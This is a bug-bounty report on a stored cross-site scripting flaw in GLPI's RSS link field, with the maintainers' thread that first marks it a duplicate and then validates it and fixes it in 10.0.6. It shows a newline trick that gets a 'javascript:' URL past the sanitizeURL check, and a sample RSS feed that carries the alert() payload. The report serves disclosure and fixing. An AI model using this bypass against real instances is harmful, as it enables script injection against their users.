Stored XSS - XSS in RSS link href attribute in glpi-project/glpi

Valid

Reported on

Nov 20th 2022


📜 Description

Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users.

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.

In your application, stored XSS occurs when a user inject an XSS payload inside RSS feeds link.

đŸ•”ïž Proof of Concept

1. Create new RSS item

2. (Optional) Share it to the whole entity

3. Click on the link

4. XSS is executed !

Bypass preg_match

The following check function can be bypassed by inserting a new line (\n) inside the payload :

    final public static function sanitizeURL(?string $url): string
    {
        if ($url === null) {
            return '';
        }

        $url = trim($url);

        if (preg_match('/^javascript:/i', $url)) {
            return '';
        }

        return $url;
    }

The payload is on two lines :

                <link>java
script:alert(`XSSSS!`)</link>

Full content of the RSS feed :

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
        <channel>
                <title>toto</title>
                <description>This is a simplified example of the RSS feed</description>
                <link>java
script:alert(`XSSSS!`)</link>
                <copyright>2021 fileformat.com All rights reserved</copyright>
                <lastBuildDate>Wed, 22 Jun 2021 00:01:00 +0000</lastBuildDate>
                <pubDate>Wed, 22 Jun 2021 16:20:00 +0000</pubDate>
                <ttl>1800</ttl>
                <item>
                        <title>Ex2ample entry</title>
                        <description>Here is some text containing an interesting description.</description>
                        <link>http://example.com</link>
                        <guid isPermaLink="false">9bd605d5-1921-8i67-dgft-65g635d3587u</guid>
                        <pubDate>Wed, 22 Jun 2021 16:20:00 +0000</pubDate>
                </item>
        </channel>
</rss>

🔐 Mitigations

For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a webpage. Each variable in a web application needs to be protected. Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitised. In PHP, you can use the htmlspecialchars function to sanitize variables.

As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur or Web Application Firewall (WAF).

📚 References

Impact

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise.

Example of impacts :

  • Disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account (Only if HttpOnly cookie's flag is set to false).
  • Redirecting the user to some other page or site (like phishing websites)
  • Modifying the content of the current page (add a fake login page that sends credentials to the attacker).
  • Automatically download malicious files.
  • Requests access to the victim geolocation / camera.
  • ...

Occurrences

References

We are processing your report and will contact the glpi-project/glpi team within 24 hours. a year ago
We have contacted a member of the glpi-project/glpi team and are waiting to hear back a year ago
Alexandre Delaunay has marked this vulnerability as a duplicate of dda8bb6d-c556-4a21-9308-43c5bf968003 a year ago
The disclosure bounty has been dropped
The fix bounty has been dropped
The researcher's credibility has decreased: -5
xanhacks
a year ago

Researcher


Hello Alexandre,

The report quoted in duplicate comes from a researcher friend of mine. We both agree that my vulnerability is not a duplicate.

Why ? Because, I realize my XSS on the link field by bypassing the "sanizeURL" function. The other report injects the decription field. Moreover, the two remediations are not the same.

Can you reconsider the status of my report?

xanhacks

xanhacks
a year ago

Researcher


@admin @maintainer ?

Pavlos
a year ago

Admin


Hi xanhacks, the maintainer has the final word on. There is nothing I can do about it, sorry.

CĂ©dric Anne
a year ago

Maintainer


@xanhacks,

I just tested on Chrome and Firefox. Nothing happens when I click on the link. Indeed, script is not evaluated on source page (GLPI), and on target page, it is blocked by browser (I get a about:blank#blocked URL).

xanhacks
10 months ago

Researcher


Hey @maintainer,

The fact that the page opens in a new tab blocks the execution of javascript with a right click.

However, it is still possible to execute the XSS with a CTRL+click or a middle click on Chrome and Firefox.

Tested on GLPI v10.0.5

Regards, xanhacks

CĂ©dric Anne
10 months ago

Maintainer


@admin I confirm that XSS can occurs. Could you please reopen this report ?

Ben Harvie
10 months ago

Admin


Hi CĂ©dric, the report has been reverted back to pending, please re-validate when you are ready:)

@xanhacks, I have reversed the reputational penalty on your profile.

Thanks!

xanhacks
10 months ago

Researcher


Hey,

Thanks for reverting the report, could I have my own CVE ? Other than the report wrongly marked as duplicate of mine.

Have a nice day.

Regards, xanhacks

CĂ©dric Anne modified the Severity from Medium (4.6) to Medium (5.3) 10 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
CĂ©dric Anne validated this vulnerability 10 months ago
xanhacks has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
CĂ©dric Anne
10 months ago

Maintainer


https://github.com/glpi-project/glpi/security/advisories/GHSA-x9g4-j85w-cmff

CĂ©dric Anne marked this as fixed in 10.0.6 with commit 5319b3 10 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jan 24th 2023
CĂ©dric Anne published this vulnerability 10 months ago
URL.php#L57 has been validated
to join this conversation